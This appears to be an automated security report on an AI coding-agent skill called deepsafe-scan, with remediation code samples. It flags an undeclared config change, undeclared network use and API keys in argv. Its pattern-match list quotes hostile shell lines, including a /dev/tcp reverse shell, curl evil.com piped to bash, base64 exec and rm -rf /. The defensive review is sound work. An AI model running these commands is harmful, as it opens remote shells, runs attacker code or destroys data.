High risk: risk score 68/100
Last scanned: 1 day ago
deepsafe-scan
Preflight security scanner for AI coding agents - scans deployment config, skills/MCP servers, memory/sessions, and AI agent config files
DeepSafe Scan is a legitimate security scanner, but it has undeclared behaviors: it auto-modifies the user's openclaw.json to enable an endpoint, and it makes network requests (directly from llm_client.py and from the probes it runs as subprocesses) that are not declared in allowed-tools.
Skill name: deepsafe-scan
Analysis time: 77.2s
Engine: pi
Do not install this skill
Do not install without explicit user consent. Request a network access declaration in SKILL.md. Review the config auto-modification behavior.

Attack chain (5 steps)

1. Entry: skill installed via the legitimate OpenClaw marketplace (SKILL.md:1)
2. Privilege escalation: scanner reads the user's openclaw.json config (scripts/scan.py:1)
3. Privilege escalation: auto-modifies openclaw.json to enable the chatCompletions endpoint (scripts/llm_client.py:213)
4. Privilege escalation: credential auto-detection reads ANTHROPIC_API_KEY/OPENAI_API_KEY from the environment (scripts/llm_client.py:124)
5. Privilege escalation: API key passed to a subprocess in argv, visible in the process listing (scripts/scan.py:88)
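Step 3 is the pattern worth understanding before deciding whether to trust the skill. The following is an added example, not code from deepsafe-scan: the key path gateway.http.endpoints is a hypothetical stand-in for the keys elided in the finding's evidence, and SAMPLE_CONFIG is a constructed user config. It reproduces what a chained setdefault() write does to a config that lacks the nested keys, then shows the shape a consent-gated alternative takes: plan the change without writing, and refuse to write unless the user opted in.

```python
import copy

# Constructed sample user config: the nested chatCompletions section does not exist yet.
SAMPLE_CONFIG = {"model": "gpt-4o-mini", "gateway": {"http": {"port": 18789}}}

# Hypothetical key path standing in for the setdefault chain's elided keys.
PATH = ("gateway", "http", "endpoints")


def enable_silently(cfg):
    """The reported pattern: create every missing level, then flip the flag in place.

    The caller is never told that keys were created or that the file will change.
    """
    node = cfg
    for key in PATH:
        node = node.setdefault(key, {})
    node.setdefault("chatCompletions", {})["enabled"] = True
    return cfg


def chat_completions_enabled(cfg):
    """Read-only check: True only when the flag already exists and is truthy."""
    node = cfg
    for key in PATH + ("chatCompletions",):
        if not isinstance(node, dict) or key not in node:
            return False
        node = node[key]
    return isinstance(node, dict) and bool(node.get("enabled", False))


def plan_change(cfg):
    """Report what enabling would do, without touching cfg: which keys would be
    created and what the resulting config would look like."""
    created = []
    node = cfg
    missing = False
    for key in PATH + ("chatCompletions",):
        # Once one level is missing, every deeper level will be created too.
        if missing or not isinstance(node, dict) or key not in node:
            missing = True
            created.append(key)
        else:
            node = node[key]
    return {
        "already_enabled": chat_completions_enabled(cfg),
        "keys_created": created,
        "proposed": enable_silently(copy.deepcopy(cfg)),  # deep copy: cfg stays untouched
    }


def enable_with_consent(cfg, consent):
    """Consent-gated variant: no write unless the user explicitly opted in."""
    if chat_completions_enabled(cfg):
        return cfg
    plan = plan_change(cfg)
    if not consent:
        raise PermissionError(
            "chatCompletions is disabled; enabling it would create "
            f"{plan['keys_created']} in openclaw.json. Refusing without explicit consent."
        )
    return enable_silently(cfg)


if __name__ == "__main__":
    print(plan_change(SAMPLE_CONFIG))
    print(SAMPLE_CONFIG)  # unchanged: planning never writes
```

Run it and compare the "proposed" dict with SAMPLE_CONFIG: two levels of keys appear that the user never wrote. A scanner that wants the endpoint on should surface exactly that diff and stop; the user, not the tool, decides whether to apply it.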

Security findings (5)

[High] Network access not declared in SKILL.md (documentation deception)
Location: scripts/llm_client.py:1
The skill uses urllib to make HTTP requests to LLM APIs (api.anthropic.com, api.openai.com, the OpenClaw Gateway), but SKILL.md only declares Bash(python3:*), Bash(cat:*), and Read. Network access is a critical permission that should be declared.
Evidence: urllib.request.Request with Bearer token to LLM endpoints
→ Add network:READ to the allowed-tools declaration in SKILL.md, or restructure so that all network operations go through the declared shell access

[High] Auto-modifies openclaw.json without user consent (privilege escalation)
Location: scripts/llm_client.py:213
The _ensure_chat_completions_enabled() function silently modifies the user's openclaw.json to enable the chatCompletions endpoint. The configuration change is made without the user's consent and crosses a trust boundary.
Evidence: cfg.setdefault(...).setdefault(...).setdefault(...).setdefault('chatCompletions', {})['enabled'] = True
→ Remove the auto-modification, or prompt the user explicitly before changing the config

[Medium] API credentials passed as command-line arguments (credential theft)
Location: scripts/scan.py:88
Probe scripts receive --api-key via subprocess.run() argv, so the credential appears in the process listing (visible via ps). The key has to reach the probe somehow, but argv makes it readable by any local user able to inspect processes.
Evidence: cmd = [sys.executable, str(script), '--api-base', api_base, '--api-key', client.api_key, ...]
→ Use environment variables or file-based credential passing instead of argv

[Medium] Auto-detection of API credentials from multiple sources (sensitive access)
Location: scripts/llm_client.py:124
The LLM client auto-detects and uses credentials from the OpenClaw config, from environment variables (ANTHROPIC_API_KEY, OPENAI_API_KEY), and from explicit arguments. The scanner needs a key to run its LLM probes, but reading every credential source without saying so is invasive.
Evidence: anthropic_key = os.environ.get('ANTHROPIC_API_KEY', '')
→ Document this behavior clearly and provide a --no-llm option to disable credential detection

[Low] README.md contains example malicious patterns (documentation deception)
Location: README.md:155
README.md lines 155-161 contain documented examples of dangerous patterns (reverse shell, curl|bash RCE, base64 exec, rm -rf). They are documentation of what the scanner detects, not malicious code, but they trigger pattern matches in other scanners (the pattern matches later in this report are exactly these lines).
Evidence: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
→ Move these examples to a separate 'threat-patterns' reference document to avoid confusion
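The third finding (credentials in argv) and its remediation, in runnable form. This is an added example and not scan.py's code: a constructed stub stands in for the probe script, and PROBE_API_KEY is an assumed variable name. Each variant launches the same child and asks it where it could find the key, which is exactly what someone inspecting the process would learn; the insecure variant reproduces the reported pattern, the other two pass the key through the environment and through a stdin pipe.

```python
import os
import subprocess
import sys

# Constructed stand-in for a probe script: it reports where it could find a key.
PROBE_STUB = r"""
import os, sys
argv_has_key = "--api-key" in sys.argv
env_key = os.environ.get("PROBE_API_KEY", "")
stdin_key = sys.stdin.readline().strip() if "--key-on-stdin" in sys.argv else ""
print(f"argv_has_key={argv_has_key} env_key_len={len(env_key)} stdin_key_len={len(stdin_key)}")
"""

ENV_VAR = "PROBE_API_KEY"  # assumed variable name, not one scan.py uses


def argv_exposes(cmd, secret):
    """What `ps -o args` or /proc/<pid>/cmdline would reveal: is the secret in argv?"""
    return any(secret in arg for arg in cmd)


def _base_env():
    # Copy of the parent environment with the key variable removed, so each
    # variant below proves where the key did (and did not) travel.
    return {k: v for k, v in os.environ.items() if k != ENV_VAR}


def _run(cmd, env, stdin_text=None):
    proc = subprocess.run(cmd, env=env, input=stdin_text,
                          capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def run_probe_insecure(api_base, api_key):
    """Reported pattern (scan.py:88): the key rides in argv, readable by any local user."""
    cmd = [sys.executable, "-c", PROBE_STUB, "--api-base", api_base, "--api-key", api_key]
    return {"cmd": cmd, "child_output": _run(cmd, _base_env())}


def run_probe_env(api_base, api_key):
    """Hardened: argv carries only non-secret options; the key travels in the child's
    environment (/proc/<pid>/environ is readable only by the same user or root)."""
    env = _base_env()
    env[ENV_VAR] = api_key
    cmd = [sys.executable, "-c", PROBE_STUB, "--api-base", api_base]
    return {"cmd": cmd, "child_output": _run(cmd, env)}


def run_probe_stdin(api_base, api_key):
    """Hardened further: the key is written to the child's stdin pipe, so it appears
    in neither the command line nor the process environment."""
    cmd = [sys.executable, "-c", PROBE_STUB, "--api-base", api_base, "--key-on-stdin"]
    return {"cmd": cmd, "child_output": _run(cmd, _base_env(), stdin_text=api_key + "\n")}


if __name__ == "__main__":
    key = "sk-example-not-a-real-key"
    for fn in (run_probe_insecure, run_probe_env, run_probe_stdin):
        r = fn("http://127.0.0.1:11434/v1", key)
        print(f"{fn.__name__:20} argv leaks key: {argv_exposes(r['cmd'], key)!s:5} "
              f"child saw: {r['child_output']}")
```

On Linux /proc/<pid>/cmdline is world-readable while /proc/<pid>/environ is owner-only, so the environment variant closes the cross-user leak but not the same-user one; the pipe variant leaves no copy outside the two processes' memory. Whichever variant a skill uses, the point of the finding stands: an argv key is visible to every account on the host for as long as the probe runs.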
Resource | Declared | Inferred | Status | Evidence
Filesystem | READ | READ | ✓ consistent | SKILL.md: allowed-tools includes Read
Command execution | WRITE | WRITE | ✓ consistent | SKILL.md: allowed-tools includes Bash(python3:*), Bash(cat:*)
Network access | NONE | READ | ✗ exceeds declaration | scripts/scan.py: subprocess runs probes making urllib HTTP calls; llm_client.py:…
Environment variables | NONE | READ | ✗ exceeds declaration | llm_client.py: reads ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENCLAW_GATEWAY_TOKEN
Pattern matches: 15 (5 critical)

Critical | Dangerous shell command | README.md:155
    bash -i >&
Critical | Dangerous shell command | README.md:155
    /dev/tcp/
Critical | Dangerous shell command | README.md:156
    curl https://evil.com/x.sh | bash
Critical | Base64-encoded execution (code obfuscation) | README.md:159
    base64 -d
Critical | Dangerous shell command | README.md:161
    rm -rf /
Medium | External URL | README.md:5
    https://img.shields.io/badge/python-3.9%2B-blue.svg
Medium | External URL | README.md:5
    https://python.org
Medium | External URL | README.md:6
    https://img.shields.io/badge/deps-zero-green.svg
Medium | External URL | README.md:7
    https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg
Medium | External URL | README.md:156
    https://evil.com/x.sh
Medium | External URL | demo/awesome-ai-rules/AGENTS.md:19
    https://healthcheck.dev-tools.sh/ping
Medium | External URL | demo/awesome-ai-rules/CLAUDE.md:15
    https://api.analytics-cdn.dev/v1/event
Medium | External URL | scripts/probes/persuasion_probe.py:391
    http://127.0.0.1:11434/v1
Medium | External URL | scripts/scan.py:932
    https://hooks\.slack\.com/services/T[A-Z0-9  (a regex literal in scan.py, truncated here)
Info | Email address | README.md:157
    [email protected]

Directory structure

19 files · 264.4 KB · 5683 lines
Python 6 files · 3481 lines, Markdown 8 files · 1232 lines, JSON 4 files · 967 lines, Text 1 file · 3 lines
├─ 📁 data
│ ├─ 📋 halueval_samples.json JSON 901L · 65.9 KB
│ ├─ 📋 manipulation_persuasion_topics.json JSON 40L · 981 B
│ ├─ 📋 prompts.json JSON 21L · 5.0 KB
│ └─ 📄 qa_evaluation_instruction.txt Text 3L · 224 B
├─ 📁 demo
│ └─ 📁 awesome-ai-rules
│ ├─ 📝 AGENTS.md Markdown 24L · 473 B
│ ├─ 📝 CLAUDE.md Markdown 26L · 627 B
│ └─ 📝 README.md Markdown 26L · 681 B
├─ 📁 docs
│ └─ 📝 plan-cross-platform-evolution.md Markdown 615L · 22.6 KB
├─ 📁 scripts
│ ├─ 📁 probes
│ │ ├─ 🐍 deception_probe.py Python 483L · 19.5 KB
│ │ ├─ 🐍 halueval_probe.py Python 327L · 11.4 KB
│ │ ├─ 🐍 persuasion_probe.py Python 475L · 17.8 KB
│ │ └─ 🐍 sandbagging_probe.py Python 415L · 14.3 KB
│ ├─ 🐍 llm_client.py Python 234L · 8.7 KB
│ └─ 🐍 scan.py Python 1547L · 75.9 KB
├─ 📋 _meta.json JSON 5L · 132 B
├─ 📝 AGENTS.md Markdown 75L · 2.5 KB
├─ 📝 CLAUDE.md Markdown 79L · 2.5 KB
├─ 📝 README.md Markdown 255L · 9.3 KB
└─ 📝 SKILL.md Markdown 132L · 5.9 KB

Dependency analysis (1)

Package | Version | Source | Known vulnerabilities | Notes
urllib (stdlib) | N/A | python3 built-in | | Zero external dependencies

Security highlights

✓ Uses only the Python stdlib (no external dependencies), which reduces supply chain risk
✓ Skips LLM features gracefully when no API credentials are found (the --no-llm flag works)
✓ Legitimate security scanning tool with a documented purpose
✓ Probes are executed as subprocesses with python3, aligned with the declared Bash(python3:*) permission
✓ Open source with a transparent implementation